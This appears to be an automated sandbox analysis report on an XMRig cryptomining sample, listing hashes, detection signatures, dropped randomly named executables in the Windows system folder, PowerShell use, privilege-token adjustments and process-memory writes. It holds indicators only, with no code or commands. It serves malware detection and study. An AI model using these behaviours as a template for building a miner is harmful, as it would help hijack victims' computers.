Malware Analysis Report

2025-04-19 16:51

Sample ID 240522-xcgtgace34
Target 683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118
SHA256 cd40b857c2fd6acd4ccec1fae17394238c366de117996badbda8df57ed343af0
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cd40b857c2fd6acd4ccec1fae17394238c366de117996badbda8df57ed343af0

Threat Level: Known bad

The file 683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 18:42

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 18:42

Reported

2024-05-22 18:44

Platform

win7-20240215-en

Max time kernel

149s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\QMiHDMJ.exe N/A
N/A N/A C:\Windows\System\JFKYSSd.exe N/A
N/A N/A C:\Windows\System\VJdRBjd.exe N/A
N/A N/A C:\Windows\System\fTeHfCd.exe N/A
N/A N/A C:\Windows\System\KmaQKDB.exe N/A
N/A N/A C:\Windows\System\QrgnCDG.exe N/A
N/A N/A C:\Windows\System\oUYVDDL.exe N/A
N/A N/A C:\Windows\System\YcWNsIU.exe N/A
N/A N/A C:\Windows\System\GRikwIy.exe N/A
N/A N/A C:\Windows\System\JYOFxGs.exe N/A
N/A N/A C:\Windows\System\cymHrrf.exe N/A
N/A N/A C:\Windows\System\jPMiWAD.exe N/A
N/A N/A C:\Windows\System\GreBktc.exe N/A
N/A N/A C:\Windows\System\mqWpNqC.exe N/A
N/A N/A C:\Windows\System\wLaSZGE.exe N/A
N/A N/A C:\Windows\System\Hbpsrjt.exe N/A
N/A N/A C:\Windows\System\jNlJgvG.exe N/A
N/A N/A C:\Windows\System\qZdXNqe.exe N/A
N/A N/A C:\Windows\System\eQmdmYx.exe N/A
N/A N/A C:\Windows\System\eZxMemu.exe N/A
N/A N/A C:\Windows\System\wZMYHvg.exe N/A
N/A N/A C:\Windows\System\BwbzRYy.exe N/A
N/A N/A C:\Windows\System\WhdzYPE.exe N/A
N/A N/A C:\Windows\System\epvlwLy.exe N/A
N/A N/A C:\Windows\System\hhdxiBX.exe N/A
N/A N/A C:\Windows\System\hxjewgT.exe N/A
N/A N/A C:\Windows\System\HLpBcdd.exe N/A
N/A N/A C:\Windows\System\nKsmuTM.exe N/A
N/A N/A C:\Windows\System\GGifIzJ.exe N/A
N/A N/A C:\Windows\System\HuzDMTd.exe N/A
N/A N/A C:\Windows\System\satPXjX.exe N/A
N/A N/A C:\Windows\System\gUPXgcg.exe N/A
N/A N/A C:\Windows\System\zPRRTLR.exe N/A
N/A N/A C:\Windows\System\Emofegn.exe N/A
N/A N/A C:\Windows\System\YJtWhPU.exe N/A
N/A N/A C:\Windows\System\tTvkwcN.exe N/A
N/A N/A C:\Windows\System\siGMXON.exe N/A
N/A N/A C:\Windows\System\paYUCDl.exe N/A
N/A N/A C:\Windows\System\SnwnfVI.exe N/A
N/A N/A C:\Windows\System\dEZkFrw.exe N/A
N/A N/A C:\Windows\System\IrvXtEU.exe N/A
N/A N/A C:\Windows\System\nyyneJx.exe N/A
N/A N/A C:\Windows\System\PMSdxbc.exe N/A
N/A N/A C:\Windows\System\CewlPdY.exe N/A
N/A N/A C:\Windows\System\shnvFAG.exe N/A
N/A N/A C:\Windows\System\UgZzPLf.exe N/A
N/A N/A C:\Windows\System\ZOIbUnU.exe N/A
N/A N/A C:\Windows\System\AkSWsGt.exe N/A
N/A N/A C:\Windows\System\IRgKnwj.exe N/A
N/A N/A C:\Windows\System\osXYWjB.exe N/A
N/A N/A C:\Windows\System\ARAGKtL.exe N/A
N/A N/A C:\Windows\System\tmINzjj.exe N/A
N/A N/A C:\Windows\System\SWbHHsq.exe N/A
N/A N/A C:\Windows\System\ryNnVxg.exe N/A
N/A N/A C:\Windows\System\NpHAagG.exe N/A
N/A N/A C:\Windows\System\WyExZju.exe N/A
N/A N/A C:\Windows\System\iiAhica.exe N/A
N/A N/A C:\Windows\System\pZhxMqW.exe N/A
N/A N/A C:\Windows\System\oKHRpUE.exe N/A
N/A N/A C:\Windows\System\MmUzhEH.exe N/A
N/A N/A C:\Windows\System\cHiATrU.exe N/A
N/A N/A C:\Windows\System\azxMGrq.exe N/A
N/A N/A C:\Windows\System\QZYuwqQ.exe N/A
N/A N/A C:\Windows\System\JvvggrR.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\dXjyzgV.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mCRHcSs.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\DaTNCWw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\aBxQdPV.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\PIysKoR.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mDYmKUV.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mbVnPNE.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\MNQwAxg.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mFCzxoT.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\JmJKwmZ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\vpXYFEr.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mqOPMcT.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\OCaqxAl.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mNbpjsf.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\TENPASd.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\EPzRheA.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\bouZwuC.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tDUEKWa.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\qGnsJVG.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\JGkqIcb.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\AgauvAy.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\TCIMsYQ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\HuDyqNr.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\pPOqHUe.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\VoTJXon.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ahFYRKE.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\yxGwiqa.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ISSgCsp.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\rNOcQhm.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\nCCgeWx.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\XecFPez.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ZoZIlPi.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\iSRlpzs.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\gSNFuhL.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\FpuhUrt.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tojWIgO.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\jIWeBAJ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\zyZMuhs.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\JwlUYVs.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tBcvdXK.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\VMfNwwi.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\lvVDhoK.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\hYAdljK.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\kIIkuXJ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\sLFsRxt.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\PbDjdGu.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\zEDpSMQ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\PfUcoEy.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\dCvNnux.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eqhqkIL.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\TwJOVYC.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ItJDSJV.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\FjYmekc.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ChhXGvg.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ASirDQy.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\bOOcvVC.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mhuVqMU.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\bnctStD.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\YnVgzrG.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\LPmIRTw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\fCBQomV.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\owgitGR.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\RoAlAvR.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\EaVdiJI.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QMiHDMJ.exe
PID 2228 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QMiHDMJ.exe
PID 2228 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QMiHDMJ.exe
PID 2228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JFKYSSd.exe
PID 2228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JFKYSSd.exe
PID 2228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JFKYSSd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VJdRBjd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VJdRBjd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VJdRBjd.exe
PID 2228 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\fTeHfCd.exe
